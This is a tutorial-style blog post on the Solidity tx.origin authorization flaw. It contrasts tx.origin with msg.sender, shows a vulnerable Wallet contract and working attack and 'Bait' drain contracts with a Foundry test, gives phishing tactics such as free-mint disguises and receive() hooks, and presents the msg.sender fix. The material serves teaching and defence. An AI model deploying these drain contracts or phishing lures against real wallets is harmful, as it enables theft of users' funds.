Summary of tx.origin security issues
2022-07-04 17:13:00 【Foal】
In contract code the most common way to check authorization is msg.sender. Some programmers are unfamiliar with the difference between tx.origin and msg.sender, and an authorization check built on tx.origin can make the contract exploitable. The typical attack combines this tx.origin flaw with phishing: the attacker only needs the authorized account to interact, directly or indirectly, with a contract the attacker controls.
tx.origin is a Solidity global variable that returns the address of the externally owned account that signed and sent the transaction.
Checking authorization with tx.origin is unsafe because it identifies the original sender, not the immediate caller. In an attack the call chain is: original sender -> attacker's contract -> victim contract. Inside the victim contract, tx.origin is still the original sender, so the check passes even though the call actually came from the attacker's contract.
Prerequisites
EOA accounts and contract accounts
Ethereum has two kinds of accounts: externally owned accounts (EOA) and contract accounts (SCA).
- An external account is controlled by a public/private key pair and holds an Ether balance.
- A contract account holds an Ether balance and also a piece of code; that code runs when an external account or another contract sends a transaction or message to the contract address.
External accounts (EOA)
- Controlled by a public/private key pair
- Hold an Ether balance
- Can send transactions
- Contain no execution code
Contract accounts
- Hold an Ether balance
- Contain execution code
- The code runs only when a transaction targets the contract address or a message from another contract is received
- Have their own independent storage state and can call other contracts
The difference between msg.sender and tx.origin
tx.origin: the original caller, i.e. the address that signed and sent the transaction. This is always an EOA.
msg.sender: the most recent caller, i.e. the address that directly invoked the current function. It can be an EOA or a contract.
If EOA user A calls contract B, and contract B calls contract C, then:
- In contract C, msg.sender is contract B's address and tx.origin is A's address.
- In contract B, msg.sender is A's address and tx.origin is also A's address.
Checking tx.origin == msg.sender therefore tells you whether the immediate caller is an EOA (true) or a contract (false). Note that this check also rejects legitimate contract-based callers such as multisig wallets.
Reflection: can an account be classified as EOA or SCA by checking whether the address contains execution code?
No. A deployed contract address has a code size greater than zero, but a code size of zero (EXTCODESIZE of the caller) does not guarantee the address is not a contract: while a contract is still executing its constructor its code size is also zero, so a contract can call out from its constructor and pass such a check.
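The two checks discussed above, tx.origin == msg.sender and the code-size test, side by side along the chain A (EOA) -> B -> C, as an added example that is not code from the original post. Gate, Forwarder and ConstructorCaller are illustrative names chosen here; ConstructorCaller shows the constructor-time bypass of the code-size check.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example (not from the original post). Contract and function names
// are illustrative assumptions.

// C in the chain A -> B -> C: exposes both "is the caller an EOA?" checks.
contract Gate {
    event Seen(address msgSender, address txOrigin);

    // Check 1: tx.origin == msg.sender. True only when the EOA that signed
    // the transaction calls this contract directly. Also rejects legitimate
    // contract wallets such as multisigs.
    function onlyDirectEOA() external returns (bool) {
        emit Seen(msg.sender, tx.origin);
        return msg.sender == tx.origin;
    }

    // Check 2: code size of the caller (EXTCODESIZE). Zero for an EOA, but
    // ALSO zero for a contract that is still running its constructor.
    function callerHasNoCode() external view returns (bool) {
        return msg.sender.code.length == 0;
    }
}

// B in the chain A -> B -> C: forwards both checks to Gate.
// Called by EOA A: viaOrigin() returns false (msg.sender in Gate is this
// contract, tx.origin is A); viaCodeSize() returns false (this contract
// is deployed, so its code size is non-zero).
contract Forwarder {
    Gate public gate;

    constructor(Gate _gate) { gate = _gate; }

    function viaOrigin() external returns (bool) { return gate.onlyDirectEOA(); }
    function viaCodeSize() external view returns (bool) { return gate.callerHasNoCode(); }
}

// Calls Gate from its constructor. At that moment the code size of this
// address is still zero, so the code-size check wrongly reports "no code",
// while the tx.origin == msg.sender check still correctly returns false.
contract ConstructorCaller {
    bool public passedCodeSizeCheck;
    bool public passedOriginCheck;

    constructor(Gate gate) {
        passedCodeSizeCheck = gate.callerHasNoCode(); // true: check bypassed
        passedOriginCheck = gate.onlyDirectEOA();     // false: caller is a contract
    }
}
```

Deploy Gate, then deploy ConstructorCaller with Gate's address and read the two public flags: passedCodeSizeCheck is true and passedOriginCheck is false, which is exactly why the code-size test cannot be used to prove an address is an EOA.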
Vulnerability demonstration
In the vulnerable contract below, the transfer method performs a check whose intent is that only the owner can transfer. The check used is tx.origin == owner. We assume the deployer of the Wallet contract is Alice.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Wallet {
    address public owner;

    constructor() payable {
        owner = msg.sender; // Alice, the deployer
    }

    // Vulnerable: authorizes on tx.origin, the EOA that signed the
    // transaction, not on the immediate caller.
    function transfer(address payable _to, uint _amount) public {
        require(tx.origin == owner, "Not owner");
        (bool sent, ) = _to.call{value: _amount}("");
        require(sent, "Failed to send Ether");
    }
}
```
A hacker (assume Eve is the hacker) can exploit this as follows:
- Eve writes an Attack contract and deploys it.
- Eve uses phishing or similar means to induce the deployer of the Wallet contract (Alice) to call the attack method of the Attack contract.
- Eve receives the ETH held by the Wallet contract.
Attack contract code (in the same file as Wallet above):

```solidity
contract Attack {
    address payable public owner; // Eve
    Wallet wallet;

    constructor(Wallet _wallet) {
        wallet = _wallet;
        owner = payable(msg.sender);
    }

    // When Alice (Wallet's owner) calls this, tx.origin inside
    // wallet.transfer is Alice, so the check passes and the whole
    // balance is sent to Eve.
    function attack() public {
        wallet.transfer(owner, address(wallet).balance);
    }
}
```
In this flow Alice calls the attack method of the Attack contract, and attack calls the transfer method of the wallet contract. Inside transfer, tx.origin is Alice (msg.sender is the Attack contract). Since Alice is the owner of Wallet, the check passes and the ETH is sent to Eve.
Another question: would Alice really be foolish enough to call Eve's contract?
That depends on Eve's phishing technique. A method named attack like the one above would rarely fool Alice. But if the method is disguised as a free NFT mint named freemint, contains a lot of otherwise normal code, and calls another contract C which in turn calls wallet.transfer, the problem is hard to recognize. Moreover, when Alice uses DApps in daily life (Uniswap, STEPN and the like), the front end interacts with her wallet in exactly this way, by calling contract methods; compared with a phishing email that directly carries a fake link, her guard against this kind of phishing is lower.
Eve can therefore raise the odds of a successful phish in the following ways:
- Multiple contract hops: contract A calls contract B, B calls C, C calls D, ..., and the last contract calls wallet.transfer. Every hop preserves tx.origin.
- Social-engineering disguise: exploit greed with low-price or free-mint banners, or the lure of high yields.
- Hiding the exploit in a receive function, triggered by inducing the user to send Ether to the attacker's contract, for example by pretending to exchange tokens with the user at a large discount.
Safety suggestion
In this case, use msg.sender instead of tx.origin, so that the immediate caller must be the owner:

```solidity
function transfer(address payable _to, uint256 _amount) public {
    require(msg.sender == owner, "Not owner"); // immediate caller must be owner
    (bool sent, ) = _to.call{value: _amount}("");
    require(sent, "Failed to send Ether");
}
```
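The attack flow from the vulnerability demonstration, the receive() variant from the phishing section, and the fix above, replayed in one Foundry test. This is an added example, not code from the original post; it assumes forge-std is installed (e.g. via forge init), and SafeWallet, Bait and TxOriginTest are illustrative names. vm.prank(sender, origin) sets both msg.sender and tx.origin for the next call, which is what a real transaction signed by Alice looks like to the contracts.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not code from the original post. Assumes forge-std is
// available (`forge init`); SafeWallet, Bait, TxOriginTest are illustrative.
import "forge-std/Test.sol";

// Vulnerable wallet from the post: authorizes on tx.origin.
contract Wallet {
    address public owner;
    constructor() payable { owner = msg.sender; }
    function transfer(address payable _to, uint256 _amount) public {
        require(tx.origin == owner, "Not owner");
        (bool sent, ) = _to.call{value: _amount}("");
        require(sent, "Failed to send Ether");
    }
}

// Hardened wallet with the same ABI: authorizes on msg.sender.
contract SafeWallet {
    address public owner;
    constructor() payable { owner = msg.sender; }
    function transfer(address payable _to, uint256 _amount) public {
        require(msg.sender == owner, "Not owner");
        (bool sent, ) = _to.call{value: _amount}("");
        require(sent, "Failed to send Ether");
    }
}

// Eve's bait. freeMint() is the disguised entry point a phishing front end
// calls; receive() fires when Alice merely sends ETH to this address.
// Both forward to wallet.transfer while tx.origin is still Alice.
contract Bait {
    address payable public immutable eve;
    address public immutable wallet; // Wallet or SafeWallet, same selector

    constructor(address _wallet) {
        wallet = _wallet;
        eve = payable(msg.sender);
    }
    function _drain() internal {
        Wallet(wallet).transfer(eve, wallet.balance);
    }
    function freeMint() external { _drain(); }
    receive() external payable { _drain(); }
}

contract TxOriginTest is Test {
    address alice = makeAddr("alice");
    address eve = makeAddr("eve");

    // Alice deploys a wallet holding 10 ether; Eve deploys the bait.
    function _deploy(bool safe) internal returns (address wallet, Bait bait) {
        vm.deal(alice, 11 ether);
        vm.prank(alice, alice);
        wallet = safe ? address(new SafeWallet{value: 10 ether}())
                      : address(new Wallet{value: 10 ether}());
        vm.prank(eve);
        bait = new Bait(wallet);
    }

    function testFreeMintDrainsTxOriginWallet() public {
        (address wallet, Bait bait) = _deploy(false);
        vm.prank(alice, alice);      // Alice signs the "free mint" transaction
        bait.freeMint();
        assertEq(wallet.balance, 0);
        assertEq(eve.balance, 10 ether);
    }

    function testReceiveHookDrainsTxOriginWallet() public {
        (address wallet, Bait bait) = _deploy(false);
        vm.prank(alice, alice);      // Alice just "pays" the bait contract
        (bool ok, ) = address(bait).call{value: 1 wei}("");
        assertTrue(ok);
        assertEq(wallet.balance, 0);
        assertEq(eve.balance, 10 ether);
    }

    function testMsgSenderWalletRejectsBait() public {
        (address wallet, Bait bait) = _deploy(true);
        vm.prank(alice, alice);
        vm.expectRevert("Not owner"); // msg.sender inside transfer is Bait
        bait.freeMint();
        assertEq(wallet.balance, 10 ether);
    }
}
```

Run it with forge test -vv: the first two tests pass because tx.origin is Alice for the whole call chain, regardless of how many contracts sit in between; the third passes because the revert from SafeWallet bubbles up through Bait, so the hardened wallet keeps its balance.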
References
- SWC-115: Authorization through tx.origin. https://swcregistry.io/docs/SWC-115
- What does tx.origin == msg.sender actually do in code? https://ethereum.stackexchange.com/questions/113962/what-does-msg-sender-tx-origin-actually-do-why
- Phishing with tx.origin (Solidity by Example). https://solidity-by-example.org/hacks/phishing-with-tx-origin